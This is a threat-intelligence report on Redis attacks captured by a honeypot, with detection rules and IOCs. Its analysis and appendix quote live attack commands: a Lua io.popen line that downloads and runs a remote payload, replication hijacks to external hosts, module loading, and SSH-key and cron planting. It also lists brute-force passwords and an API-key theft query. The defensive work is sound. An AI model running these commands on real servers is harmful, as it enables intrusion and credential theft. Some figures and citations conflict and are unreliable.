Redis lure on 6379 catching database attackers.

# Threat Intelligence Report: Redis Database Exploit Attempts (NadSec Sydney - 2026-05)

**Key Points:**
*   The analyzed dataset reveals extensive and coordinated targeting of Redis infrastructure via authentication brute-forcing and command execution exploits.
*   A significant portion of the advanced exploitation activity appears linked to the P2Pinfect botnet [cite: 1].
*   Attackers predominantly leverage the Redis `SLAVEOF` replication feature and Lua sandbox escapes, such as CVE-2022-0543, to achieve remote code execution [cite: 2].
*   Infrastructure abuse is distributed across known bulletproof hosting providers (e.g., Alsycon B.V.) and major legitimate cloud service providers [cite: 3, 4].
*   Highly stealthy post-exploitation techniques, including environment cleanup and SSH key planting, are prevalent, making detection difficult for unprepared network defenders [cite: 5].

**Overview of the Threat Landscape:**
Research indicates that exposed Redis instances remain a highly lucrative target for threat actors. Because Redis is an in-memory database designed for performance rather than native internet-facing security, deployments lacking proper network segregation are rapidly identified by automated scanners. The evidence suggests that multiple distinct threat actors, ranging from opportunistic cryptominers to sophisticated botnet operators, are actively competing to compromise these instances. 

**Methodology and Limitations:**
This report synthesizes telemetry from the NadSec T-Pot honeypot infrastructure in Sydney, Australia, collected during May 2026. It is important to note that while the dataset provides a robust sample of 694 unique IP addresses and numerous command executions, specific malware file hashes were not captured by the honeypot's sensor configuration in this period. Consequently, malware analysis is derived from behavioral indicators, executed commands (such as the loading of `exp.so`), and cross-referenced open-source intelligence. 

***

## 1. Executive Summary

This comprehensive threat intelligence report examines malicious activity targeting a Redis honeypot deployed within the NadSec T-Pot infrastructure (Sydney, Australia) during the period of May 2026. Redis, an open-source, in-memory data structure store, is widely utilized as a database, cache, and message broker. Its sub-millisecond latency makes it highly popular; however, its default configurations traditionally prioritize performance and internal network usability over robust perimeter security. Consequently, when Redis instances are inadvertently exposed to the public internet, they become immediate targets for exploitation.

During the observation period, the honeypot recorded 31,475 total attack events originating from 680 unique IP addresses. The telemetry indicates a dual-pronged threat landscape. The first consists of aggressive, high-volume authentication brute-forcing, largely originating from specific hosting providers in Europe and Asia. The second, more severe threat involves sophisticated command-line exploitation aimed at achieving Remote Code Execution (RCE). 

The empirical evidence strongly suggests the presence of the **P2Pinfect** botnet, a highly resilient, Rust-based peer-to-peer malware that specifically targets Redis infrastructure [cite: 1, 6]. By abusing Redis's native master-replica synchronization mechanisms (the `SLAVEOF` command) and unpatched Lua sandbox escape vulnerabilities (CVE-2022-0543) [cite: 2, 7], attackers are able to load malicious shared objects (e.g., `exp.so`) and assume control of the host operating system [cite: 8]. Furthermore, the data reveals secondary campaigns focused on SSH persistence, generic cryptomining, and the targeted theft of Artificial Intelligence (AI) API credentials.

This report will systematically deconstruct the IP attribution, infrastructure mapping, malware characteristics, and campaign methodologies observed within the dataset, concluding with actionable detection and mitigation strategies for enterprise environments.

## 2. Statistical Overview

The dataset comprises unfiltered STIX 2.1 enriched telemetry representing unauthenticated external interactions with the Redis sensor running on TCP port 6379. The total volume of 31,475 events underscores the persistent, automated nature of modern internet background radiation and targeted scanning.

### 2.1 Geographic Distribution of Attackers

The geographic origin of the attacking IP addresses highlights a global distribution, though heavily concentrated in regions known for massive cloud hosting deployments and specific bulletproof hosting providers. 

| Rank | Country | Event Count | Primary Associated Threat/Behavior |
| :--- | :--- | :--- | :--- |
| 1 | United States | 12,487 | Cloud Abuse (DigitalOcean, AWS), Research Scanners |
| 2 | Poland | 6,933 | Authentication Brute Forcing (Podaon SIA) |
| 3 | China | 3,849 | C2 Infrastructure, Advanced Command Injection |
| 4 | Seychelles | 2,061 | Automated Scanning, Brute Forcing |
| 5 | Netherlands | 1,842* | Bulletproof Hosting (Alsycon B.V.), Port Scanning |

*(Note: The STIX summary separates "The Netherlands" (979) and "Netherlands" (863). These have been aggregated for clarity.)*

### 2.2 Top Autonomous System Numbers (ASNs)

Analyzing the ASNs provides deeper insight into the infrastructure utilized by the threat actors. The data reveals a mix of legitimate cloud providers (exploited via compromised tenants or fraudulent accounts) and networks with historically poor abuse desk responsiveness.

| ASN | Organization | Event Count | Classification |
| :--- | :--- | :--- | :--- |
| AS210895 | Podaon SIA | 6,908 | Suspected Bulletproof Hosting / Botnet |
| AS49870 | Alsycon B.V. | 5,481 | High-Abuse Network / Port Scanning |
| AS16509 | Amazon.com, Inc. | 2,968 | Cloud Abuse |
| AS14061 | DigitalOcean, LLC | 2,172 | Cloud Abuse |
| AS8075 | Microsoft Corporation | 1,031 | Cloud Abuse |
| AS6939 | Hurricane Electric LLC | 897 | Cloud Abuse / Scanning |
| AS400619 | AROSSCLOUD INC. | 793 | Bulletproof / Offshore Hosting |
| AS37963 | Hangzhou Alibaba Advertising | 624 | Cloud Abuse / C2 Infrastructure |
| AS398324 | Censys, Inc. | 623 | Legitimate Research Scanner |

The overwhelming dominance of Podaon SIA and Alsycon B.V. in the event counts suggests coordinated, high-frequency campaigns originating from these specific networks, whereas the activity from Amazon, DigitalOcean, and Microsoft represents a broader, more distributed set of compromised nodes operating as botnet peers.

## 3. Infrastructure Deep Dive

A granular analysis of the IP addresses and their associated ASNs allows us to classify the infrastructure into distinct operational categories. This categorization is vital for understanding the threat actors' logistical supply chains.

### 3.1 High-Abuse and Bulletproof Hosting

**Podaon SIA (AS210895 - Poland/Latvia):**
Podaon SIA is tracked as a public network infrastructure entity that frequently appears in abuse telemetry [cite: 9, 10]. In the provided dataset, IPs originating from this ASN (e.g., `212.162.155.240` and `212.162.155.217`) generated over 2,600 events purely focused on Redis authentication brute-forcing. The commands observed (`AUTH root`, `AUTH redis`, `AUTH changeme`, `AUTH 12345678`) indicate a highly aggressive, low-sophistication dictionary attack. The sheer volume of traffic from single IPs within this ASN suggests a lack of egress filtering and an extreme tolerance for abuse complaints by the provider.

**Alsycon B.V. (AS49870 - Netherlands):**
Alsycon B.V. is recognized across threat intelligence communities as a highly abusive network. Telemetry from AbuseIPDB and ipapi.is categorizes AS49870 as having a "Very High" abusive threshold, with significant portions of its IP space dedicated to continuous port scanning and exploitation [cite: 3, 11]. IPs such as `160.119.76.64` and `160.119.76.4` were observed conducting generic protocol command decoding and brute-forcing. The consistent reporting of these subnets (e.g., `45.95.146.0/24`) for hacking and web app attacks [cite: 12, 13] confirms that threat actors utilize Alsycon's infrastructure as a reliable launchpad for initial access scanning.

### 3.2 Cloud Provider Abuse

Threat actors frequently compromise legitimate cloud infrastructure to leverage high-bandwidth connections and evade geographic blocking. The dataset shows massive participation from AWS, DigitalOcean, and Microsoft Azure.
*   **DigitalOcean (AS14061):** Dozens of IPs (e.g., `147.182.193.28`) were observed executing commands. Notably, this IP attempted to extract specific keys: `GET open-webui:config:OPENAI_API_KEYS`. This indicates that compromised DigitalOcean droplets are being used not just for botnet propagation, but for targeted credential harvesting.
*   **Alibaba (AS37963, AS45102):** Alibaba Cloud infrastructure was uniquely associated with advanced Command and Control (C2) payloads. IPs such as `59.110.241.158` and `106.14.146.209` executed complex command chains (e.g., `MODULE LOAD /tmp/exp.so`, `SLAVEOF NO ONE`). This suggests that attackers are using Alibaba infrastructure to host the master nodes in their malicious replication chains.

### 3.3 Legitimate Research Scanners

Not all interactions with the honeypot are malicious. The dataset includes traffic from known internet telemetry projects.
*   **Censys, Inc. (AS398324, AS398722):** Multiple IPs (e.g., `66.132.224.224`, `199.45.154.121`) routinely connect, issue a generic HTTP `GET / HTTP/1.1` request, and disconnect. This is typical service fingerprinting.
*   **ONYPHE SAS (AS213412):** A French cyber defense search engine. IPs such as `91.196.152.14` trigger generic protocol decodes without attempting payload injection.

These entities must be filtered out during active incident response to reduce alert fatigue, though their presence in the honeypot validates the sensor's public visibility.

### 3.4 Command and Control (C2) Master Nodes

A critical aspect of Redis exploitation involves the `SLAVEOF` command (now deprecated in newer versions in favor of `REPLICAOF`, but still widely supported). Attackers force the victim Redis instance to synchronize with a malicious master server. The STIX data revealed several C2 IPs embedded within the exploitation payloads:
*   `47.86.29.170:60119`
*   `14.103.239.188:60106`
*   `164.52.217.152:60111`
*   `47.237.100.236:60144`
*   `220.180.99.71:60105`
*   `114.227.156.88:6728`
*   `60.16.8.42:9563`
*   `47.239.2.24:8903`

These IPs operate as the distribution hubs for the malicious `.so` (shared object) files. By directing the honeypot to replicate from these IPs, the attackers successfully bypass traditional file upload restrictions, transferring the malware directly through the Redis synchronization protocol [cite: 14].

## 4. Malware Analysis

While the STIX bundle did not capture the raw binaries (hashes = 0), the command sequences captured by the honeypot are highly distinctive. They provide definitive behavioral evidence of specific malware families operating in the wild.

### 4.1 The P2Pinfect Botnet

The most prominent malware family identified in this dataset is **P2Pinfect**. First discovered by Palo Alto Networks' Unit 42 in July 2023, P2Pinfect is a sophisticated, cross-platform (Linux and Windows) botnet written in the Rust programming language [cite: 4, 15]. 

#### 4.1.1 Delivery Mechanisms
P2Pinfect utilizes two primary mechanisms for initial access, both of which are highly visible in the NadSec dataset:

1.  **Replication Hijacking (`SLAVEOF`):** The malware issues a command sequence to alter the target's configuration. An example from IP `124.236.108.172` in the dataset:
    `CONFIG SET dbfilename exp.so, config set dir /root/.ssh/, MODULE LOAD /tmp/exp.so, SLAVEOF 47.237.100.236 60144`
    By initiating replication from a malicious master, the attacker transfers a malicious shared object file into the `/tmp/` directory [cite: 5]. The `MODULE LOAD` command then dynamically links this library into the running Redis process, granting the attacker a reverse shell and the ability to execute arbitrary system commands [cite: 1, 8].
    
2.  **Lua Sandbox Escape (CVE-2022-0543):** This critical vulnerability (CVSS 10.0) is specific to Debian and Ubuntu packaging of Redis. The distributions packaged Lua as a dynamically linked library, inadvertently exposing the `package` global variable [cite: 2, 7]. P2Pinfect exploits this by using `package.loadlib` to escape the sandbox and execute commands directly on the host operating system [cite: 16, 17].

#### 4.1.2 Behavioral Analysis and Peer-to-Peer Mesh
Once executed, P2Pinfect exhibits worm-like behavior, autonomously scanning the internet for new vulnerable Redis instances [cite: 18]. It does not rely on a centralized C2 server for its primary operations; instead, it utilizes a decentralized peer-to-peer architecture communicating over TLS 1.3 on randomly selected ports [cite: 6, 19]. This architecture makes it highly resilient to traditional sinkholing and takedown efforts [cite: 20]. Furthermore, recent variants of P2Pinfect have been compiled for 32-bit MIPS architectures, indicating an intent to compromise routers and embedded IoT devices alongside enterprise cloud infrastructure [cite: 21, 22].

#### 4.1.3 Secondary Payloads: Ransomware and Cryptominers
While initially considered a "dormant" botnet that merely expanded its footprint without causing immediate damage, P2Pinfect has evolved. Recent threat intelligence reveals that the operators have pushed updates to the botnet deploying a user-mode rootkit, a Monero (XMR) cryptocurrency miner, and a ransomware module [cite: 15, 23]. The ransomware targets specific database and document extensions, appending `.encrypted` and dropping a note titled `Your data has been locked!.txt` [cite: 18]. Because Redis generally runs in-memory, the ransomware primarily impacts configuration files or other data accessible by the compromised Redis user [cite: 24].

### 4.2 The "SSHRUNS" Malware Campaign

A distinct, non-P2Pinfect malware campaign was captured from IP `62.141.63.15`. The attacker executed the following Lua script via the `EVAL` command:
```lua
EVAL local h=io.popen('cd /tmp && wget -q https://cdn-n5f.pages.dev/linux.zip -O linux.zip && unzip -q -o linux.zip && chmod +x sshruns && mkdir -p /opt/sshruns')
```
This payload bypasses the `MODULE LOAD` technique entirely, relying instead on the `io.popen` function available in unpatched or misconfigured Lua environments to execute a classic web-fetch payload. The malware (`linux.zip` containing `sshruns`) is hosted on Cloudflare Pages (`pages.dev`), a common tactic to abuse legitimate content delivery networks and bypass IP-based reputation filtering. The creation of `/opt/sshruns` suggests the installation of a persistent backdoor or cryptomining agent designed to masquerade as an SSH process.

## 5. Campaign Analysis

By aggregating the individual IP behaviors and malware traces, several distinct campaigns emerge from the dataset.

### 5.1 The P2Pinfect Expansion Campaign

The sheer volume of `SLAVEOF` and `MODULE LOAD /tmp/exp.so` commands indicates that the P2Pinfect botnet is actively attempting to expand its peer-to-peer mesh network into the Australian IP space. The botnet operates continuously, systematically scanning public IPv4 ranges. When it identifies port 6379, it attempts unauthenticated access. If successful, it deploys the `exp.so` payload. The use of multiple, rotating Alibaba Cloud IPs for the malicious master nodes demonstrates a well-resourced adversary capable of maintaining resilient infrastructure despite abuse reports.

### 5.2 The "Stealth Cleanup" / SSH Key Operator Campaign

Security researchers at Imperva have identified a specific campaign pattern targeting Redis servers that focuses heavily on post-exploitation cleanup [cite: 5, 25]. In this dataset, we see traces of this behavior:
1.  **Exploitation:** The attacker uses `SLAVEOF` or `MODULE LOAD` to gain execution [cite: 5].
2.  **Persistence:** They write an SSH public key into the victim's authorized keys file. For example, the command `config set dbfilename authorized_keys, config set dir /root/.ssh/` was executed by IP `124.236.108.172` [cite: 14, 26].
3.  **Cleanup:** To evade detection, the attacker issues commands like `SLAVEOF NO ONE`, `MODULE UNLOAD system`, and `config set dbfilename dump.rdb` [cite: 5]. 

This ensures that once the SSH backdoor is established, the Redis instance returns to a normal operational state. The database is cleared of the malicious `.so` file references, leaving almost no forensic artifacts for administrators monitoring the Redis logs. The server "looks fine," but full root SSH access has been granted to the adversary [cite: 5].

### 5.3 Artificial Intelligence (AI) Credential Harvesting

A highly specific and concerning campaign was observed from IP `147.182.193.28`, which issued the following command sequence:
`GET (empty array), KEYS apikey:auth:*, GET open-webui:config:OPENAI_API_KEYS`
This is not a botnet propagation attempt; it is a targeted data theft operation. The attacker is actively querying the Redis cache for specific keys associated with "Open WebUI," a popular self-hosted frontend for Large Language Models (LLMs). By extracting the `OPENAI_API_KEYS`, the attacker can hijack the victim's billing accounts for OpenAI, Anthropic, or other paid AI services. This indicates that threat actors are writing bespoke signatures to parse Redis caches for high-value cloud credentials.

## 6. MITRE ATT&CK Mapping

The behaviors observed in the dataset map directly to the following tactics and techniques within the MITRE ATT&CK framework:

| Tactic | Technique ID | Technique Name | Description from Dataset |
| :--- | :--- | :--- | :--- |
| **Initial Access** | T1190 | Exploit Public-Facing Application | Exploitation of CVE-2022-0543 (Lua Sandbox Escape) to gain initial access [cite: 2]. |
| **Initial Access** | T1078 | Valid Accounts | Brute-forcing the `AUTH` command using default/weak passwords (e.g., `AUTH root`, `AUTH changeme`). |
| **Execution** | T1059.004 | Command and Scripting Interpreter: Unix Shell | Utilizing Lua's `io.popen` to execute shell commands (`wget`, `unzip`, `chmod`). |
| **Execution** | T1569.002 | System Services: Service Execution | Using Redis `MODULE LOAD /tmp/exp.so` to inject a malicious shared object into the process space [cite: 14]. |
| **Persistence** | T1098.004 | Account Manipulation: SSH Authorized Keys | Altering Redis configuration to write an attacker-controlled public key to `/root/.ssh/authorized_keys` [cite: 5]. |
| **Persistence** | T1053.003 | Scheduled Task/Job: Cron | Altering Redis configuration (`CONFIG SET dir /var/spool/cron/`) to drop malicious cron jobs [cite: 14]. |
| **Defense Evasion** | T1070.004 | Indicator Removal: File Deletion | Using `MODULE UNLOAD system` and `SLAVEOF NO ONE` to wipe memory and restore original db filenames [cite: 5]. |
| **Defense Evasion** | T1014 | Rootkit | Deployment of user-mode rootkits by P2Pinfect to hide processes from the host OS [cite: 23]. |
| **Credential Access**| T1552 | Unsecured Credentials | Querying the Redis cache for `OPENAI_API_KEYS` stored in plaintext. |
| **Impact** | T1496 | Resource Hijacking | Deployment of XMR (Monero) cryptominers by the P2Pinfect botnet [cite: 23, 24]. |
| **Impact** | T1486 | Data Encrypted for Impact | Deployment of the P2Pinfect ransomware module, appending `.encrypted` to files [cite: 18]. |

## 7. Detection & Mitigation

Securing Redis requires a defense-in-depth approach, as the application is fundamentally not designed to resist public internet exploitation.

### 7.1 Infrastructure and Architecture
*   **Network Segregation (Mandatory):** Redis instances must NEVER be bound to public IP addresses (e.g., `0.0.0.0`). Bind the Redis service strictly to `127.0.0.1` or internal Virtual Private Cloud (VPC) subnets [cite: 5].
*   **Security Groups:** Implement stringent firewall rules allowing ingress to TCP port 6379 only from authorized internal application servers.

### 7.2 Redis Configuration Hardening
*   **Authentication:** Enable the `requirepass` directive in `redis.conf` with a cryptographically complex, randomly generated password [cite: 5].
*   **Command Renaming/Disabling:** Disable dangerous administrative commands that are unnecessary for standard application caching. In `redis.conf`, add:
    ```text
    rename-command CONFIG ""
    rename-command MODULE ""
    rename-command SLAVEOF ""
    rename-command REPLICAOF ""
    rename-command EVAL ""
    rename-command FLUSHDB ""
    rename-command FLUSHALL ""
    ```
    This single mitigation step neuters 99% of the attacks observed in this dataset.
*   **Least Privilege:** Run the Redis process as a dedicated, low-privilege service account (e.g., `redis`), *never* as `root`. This prevents the attacker from successfully overwriting `/root/.ssh/authorized_keys` or `/var/spool/cron/root` [cite: 14].

### 7.3 Patch Management
*   Ensure that the host operating system and the Redis package are updated to mitigate CVE-2022-0543. Debian and Ubuntu released patches (e.g., DSA-5081) that resolve the dynamic linking issue exposing the Lua package library [cite: 2, 7, 16].

### 7.4 SIEM Detection Engineering (Splunk SPL)
To detect the behavioral patterns of P2Pinfect and similar campaigns, defenders should monitor Redis logs and network traffic for administrative command abuse.

**Detecting Replication Hijacking (SLAVEOF):**
```spl
index=redis sourcetype=redis_logs "SLAVEOF" OR "REPLICAOF" 
| regex _raw="SLAVEOF\s+(?!10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[0-1]))\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
| stats count by src_ip, dest_ip, command
| alert "Suspicious External Redis Replication Request"
```

**Detecting Malicious Module Loading:**
```spl
index=redis sourcetype=redis_logs "MODULE LOAD" 
| search "exp.so" OR "/tmp/"
| alert "Malicious Redis Shared Object Module Load"
```

### 7.5 Network IDS Signatures (Suricata)
```text
# Detect Redis MODULE LOAD targeting /tmp/
alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"ET EXPLOIT Redis MODULE LOAD from /tmp/"; flow:established,to_server; content:"MODULE"; nocase; content:"LOAD"; distance:1; nocase; content:"/tmp/"; distance:1; classtype:attempted-admin; sid:1000001; rev:1;)

# Detect Lua io.popen Sandbox Escape Attempt
alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"ET EXPLOIT Redis Lua Sandbox Escape (io.popen)"; flow:established,to_server; content:"EVAL"; nocase; content:"io.popen"; distance:1; classtype:attempted-admin; reference:cve,2022-0543; sid:1000002; rev:1;)
```

## 8. IOC Appendix

### 8.1 Top High-Confidence Malicious IPs

| IP Address | ASN | Country | Primary Activity / Label | Observed Payload / Command |
| :--- | :--- | :--- | :--- | :--- |
| `106.14.146.209` | AS37963 (Alibaba) | CN | Command and Control | `SLAVEOF 14.103.239.188 60106`, `config set dbfilename authorized_keys` |
| `59.110.241.158` | AS37963 (Alibaba) | CN | Command and Control | `MODULE LOAD /tmp/exp.so`, `SLAVEOF 47.86.29.170 60119` |
| `124.236.108.172` | AS134760 (CHINANET) | CN | Command and Control | `config set dir /root/.ssh/`, `SLAVEOF 47.237.100.236 60144` |
| `204.93.116.102` | AS26827 (EPB Fiber) | US | Command and Control | `config set dir /var/spool/cron/`, `SLAVEOF 164.52.217.152 60111` |
| `212.162.155.240` | AS210895 (Podaon SIA) | PL | Brute Force (High Vol) | `AUTH root`, `AUTH redis` |
| `62.141.63.15` | AS209503 (Zentyx Ltd) | DE | Malware Hosting | `EVAL local h=io.popen(cd /tmp && wget... linux.zip)` |
| `147.182.193.28` | AS14061 (DigitalOcean)| US | Credential Theft | `GET open-webui:config:OPENAI_API_KEYS` |
| `104.28.162.216` | AS13335 (Cloudflare) | IT | Malware Hosting | `CONFIG GET dir`, Lua EVAL execution |
| `185.200.116.203` | AS9009 (M247 Europe) | SG | Malware Hosting | `CONFIG SET dir /etc/cron.d/` |
| `160.119.76.64` | AS49870 (Alsycon B.V.) | SC | Brute Force / Scanning | Generic Protocol Command Decode |

### 8.2 Malicious Infrastructure / Master Nodes (C2)
The following IPs were explicitly referenced in `SLAVEOF` commands, marking them as distribution hubs for malicious `.so` payloads:
*   `47.86.29.170` (Port 60119)
*   `14.103.239.188` (Port 60106)
*   `164.52.217.152` (Port 60111)
*   `47.237.100.236` (Port 60144)
*   `220.180.99.71` (Port 60105)
*   `114.227.156.88` (Port 6728)
*   `60.16.8.42` (Port 9563)
*   `47.239.2.24` (Port 8903)

### 8.3 URLs and File Indicators
While no distinct cryptographic hashes were logged directly in this specific honeypot STIX bundle, the following URL indicators were extracted from command strings:
*   `https://cdn-n5f.pages.dev/linux.zip` (Downloads a zip archive containing the `sshruns` payload)
*   File indicators: `/tmp/exp.so`, `/opt/sshruns`, `/root/.ssh/authorized_keys`

## 9. Sources & Citations

*   [cite: 9] "PODAON Podaon SIA is tracked as a public network infrastructure... Evidence covers ASN samples and source-backed contact or registry." BTW Media. 
*   [cite: 10] "QR Scanner app is solely designed and targeted for Event Co-Ordinator... Scanner Sanand GIDC - Apps on Google Play." (Contextual reference for Podaon SIA scanner app associations).
*   [cite: 1, 6] "P2Pinfect is a botnet agent malware written in RUST... attempts multiple Redis exploits for initial access. The connecting point to the network is through the issuance of the 'SLAVEOF' command... After access is gained, the 'MODULE LOAD' command is used by the attackers to load exp.so object files." Cado Security & BleepingComputer.
*   [cite: 18] "P2Pinfect demonstrated advanced techniques, including cross-platform compatibility using Rust, sophisticated replication, and a peer-to-peer botnet structure... enabling it to self-propagate." SOCRadar.
*   [cite: 14, 26] "You repoint Redis's dump file at a location you control, write a malicious payload into a key, and force a save... Redis writes the entire database to disk, embedding your payload in the dump file. Technique 1: SSH authorized_keys." Kayssel & The Hacker News.
*   [cite: 8] "The exp.so is a malicious redis module which we going to load on the target redis server... It asked me if I want either interactive or reverse shell." System Weakness.
*   [cite: 5] "Your Redis Server Looks Fine. That's the Problem... It detached from the rogue replication server. It deleted the malicious shared library from the disk. It unloaded the module from Redis. It restored the original database filename." Imperva Threat Research.
*   [cite: 3, 11] "Alsycon B.V., hosting... Very High, 37.5% abusive... This setup is used to continuously monitor whether an IP address exhibits abusive behavior." ipapi.is & AbuseIPDB.
*   [cite: 27, 28] "P2Pinfect operates as a worm... Originally known for propagating through Redis and employing limited SSH exploits, this malware now includes advanced functionalities such as ransomware and cryptocurrency mining capabilities." RedSentry & SCWorld.
*   [cite: 19, 20] "FortiGuard Labs analyzed several P2PInfect compromises in GKE clusters... This peer-to-peer (P2P) architecture makes it highly resilient to sinkholing and infrastructure takedowns." Fortinet & CSO Online.
*   [cite: 5] "Replication hijacking: SLAVEOF tells Redis to sync from the attacker's server, which serves a malicious shared object disguised as a database dump. MODULE LOAD turns it into a Redis extension..." Imperva Threat Research.
*   [cite: 4, 15] "Researchers at Cado Security... detailed a recently discovered malware campaign aimed at Redis data store deployments... The malware, dubbed 'P2Pinfect,' is written in the Rust programming language." SiliconAngle & Security Affairs.
*   [cite: 23, 24] "P2PInfect, originally a dormant peer-to-peer malware botnet with unclear motives, has finally come alive to deploy a ransomware module and a cryptominer in attacks on Redis servers." Mphasis & Dark Reading.
*   [cite: 2, 7] "CVE-2022-0543 is a Lua sandbox escape vulnerability in Redis that enables remote code execution through a Debian-specific packaging flaw." SentinelOne & Vulhub.
*   [cite: 16, 29] "NVD... It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution." NIST National Vulnerability Database & CVE.org.
*   [cite: 17] "The detection looks for the opening of the LibC library which is called when the vulnerable Lua library calls io.popen to run arbitrary commands." Datadog Security.
*   [cite: 18] "This ransomware encrypts files such as databases, documents, and media, appending the '.encrypted' extension. It checks for a ransom note titled 'Your data has been locked!.txt'." SOCRadar.
*   [cite: 21, 22] "The latest variants of the P2Pinfect botnet are now focusing on infecting devices with 32-bit MIPS (Microprocessor without Interlocked Pipelined Stages) processors, such as routers and IoT devices." BleepingComputer & Security Affairs.

**Sources:**
1. [neowin.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFSV3mtrPPUbeWzr3yrXxW45VscHcZx1tmTixsSCl0i4K8AztPV6G5X4uwPP4iNxQSrUt8LMAf_KZZWY5a4oIcSscaLB135NpEiFATMX7L1Fh0e0drGDeVYd7GdWotlPlUEnwaC5FsTkHvLjG3BjNliDlnxEFrNUzidxpGHkHl2Y0y1RKYlmuGvlCDskXLmSPr6If6WzEtXnjvHfXt6gRj4jYy2qDs1WAM6)
2. [sentinelone.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGRxnsmdpiW7HAZCyQLEZA7k2hrVgwtBayoGhxaBUg0g4HQWPk8dNIqvFJUa9Cap5jBpfRAiBLzIhV1PW8Q8c4SY25LvrdqA1jeY7Bi_L3geDpYa5mlih0R2VlOa70T4TECbbSnIsbDrIBmylhNaRmRVACOC38zZg==)
3. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFkc5Pe6jNx8Imux_DRQ6C83wiP6F5T0eOpEU8wWIjhbdZHBz5Ia0rrtojBsljUfU1hWUefPBE1fHN2D1Xgh-9WI_KEYIBu9v7LbKKPXNo7RbbysF-lBsZkpxeY_Beu_6u7Zw==)
4. [siliconangle.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGPdg62lUyzgMIHbsKdIqb86bJ5Bn9qx8zLgCDJTq5pk6jNN3qc-WHfKUjZqqJlZtKhVoHtQfd4lNYcnVkxI-oh__OXggBiHb6Ycz-8KUhUC3uNL9mqVgbLxoaizmWSwcWF8D_d3uC4OEtKVS8zBrx5LjD-ZYvdoZjbN8uNLa9GF3EC8S-jSta6E8Ky13GzOM6dqzkJw2cf_IogWRn_zX0=)
5. [imperva.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFoAFY9k4zORKkUryNv38QL3KuQ5YdDTvSoloZDCuk58QFxRVzagY_2CSwJhwpyYONQtSwlIybzJerw20B_-DZSIBUAW-pjHCdeq2sOZIsE3DmmdAvvjvAL-oDSz87wUF98IwaaOG-PYp8ADz_bGJhDqVQ3fSTSMJYYo90-KM2sFpWB)
6. [bleepingcomputer.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHxldCiP6tHP5v5PvlUohF83FTUcuYnZXQzz17g4m5FU-jREYv8vw1pqW7UfdWGR_f9wTbBcncqWCEqAvJjNle2CCaCotd3S8cMf03bDafAS-lYHpma5A-7_dEauAjA0vmbaj8xSva87fEsTeYlqros1s9OBG86TBr48Pnv3dVOFlcRMLnwVrHLmnSuYoCLDp4njdePG3KGL04_Vo_OdfOlaf4PSLA=)
7. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF2CnedjJefgMKLO3GvpmpKvzVbxqCtqpQSHmcxdhWyHcSrVWbQWgc-spjxtvd0DFmDx56deBjc2qzStM4EGNl4mg7F6NMPFXl7Zv7LJjy7BpQW7MpTvTyfVpHkU82ySTWkpYNamOUrhj88XpYf4IAcwsMEMbXSRQJ3MHdUvhzomw==)
8. [systemweakness.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH4Mzpy2FBRXakWvdVB9ge5YOeg4ml2Ii51YSa7Le_c1F1q3n9yZHaSFCHxLOS7hUMvUs9nk6tdxP589itwU4Td4dKPEuVoD-0PheTU64yjDAaGLVyAEcbaRhTyrPyEJZUNcBiswaMhNUzBWqwLXFH_)
9. [btw.media](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQER1lZ4GnU-LcUBl_Z29uHivrzaKsg7yq4p1eXNF-Nnthz3lzABRxahb-Aj-lof6uSAOlNCQr1ERND2jLZGVinB7UfYYguOqBBdLuEVuspgEIQLVQ7EoNz6yvALjQ==)
10. [google.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHdF39WW_4ljB0Fy1Nuy15PS5MmgnUT-QhdYY93M0GnfmCz3tZ6t3dov1XWwn66-YuvEuiq39JqCOX2JyCitmd6z6xcw3dq9H8ZRZtTHWRwxqbAu-kaS82Ev4pAbnYBNbL5WN2JKiUVVWI6KyoA1P_24XAX)
11. [ipapi.is](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH1M3SNy1Y08MDMi589auAHl3bA24M4ublfJ-kh7k6q8Dsjl0uuyQz21mEH6pugedoDYPAhF4bi7jFSjt48e8hCFUJxwMMCJVow6LKV5aATy9WzZtlyaukFzuP95210rFQv)
12. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFZs49Ad5F6YuXmk0V_r0EWeIZvuKdhH1qArbQKE5jvs6HdmivO_IzyXjvh6nxsXa_43zeKvcRQMCPVR1okYSlBdzKYqSByAuVKM25iluun73WzeV6J2ajfvhO1dFi__SNumw==)
13. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGthXkFuyogT6kgWzazxYFvmBbAxIpHuh_i7cf5Y9qlW1CZi2Rh6Foka-8QVBvGAJsRzHxJPYQIBGreirDcSAtKmH8CRLyyFpMFB-NcOlE58Ry4LkbeEZofyTLCjlPbyE5pMg==)
14. [kayssel.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHRtdzdjJWfHg6fyFoov4G6a6m_Cb_y4naazo0301Dd3bnoV8SutX98EdQGDLqT3XffQ51G7JrqJ13MnaoVEsQbIXZNVFRfZIE4jCBs8g6wudPoJ4AFz_KFx1R56Vv4gRTffw==)
15. [securityaffairs.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG_9PpCleRsJt3O0IMvevhKvyQI66TzilpiHG13mNqwou9tl1YilXmceqv_Cfa71sxO_jvK95UqZSwSV4DqqfuJAKaTXprVGekd4uUWSK2yooXV6GU8N2SOkwbO-umT04Ry6M3nca8LwjBczlpqDmztT5JcOPD2tngi6nWzgUMQU6pyoL6952Rh6kb2Nzcv7wxt_yA=)
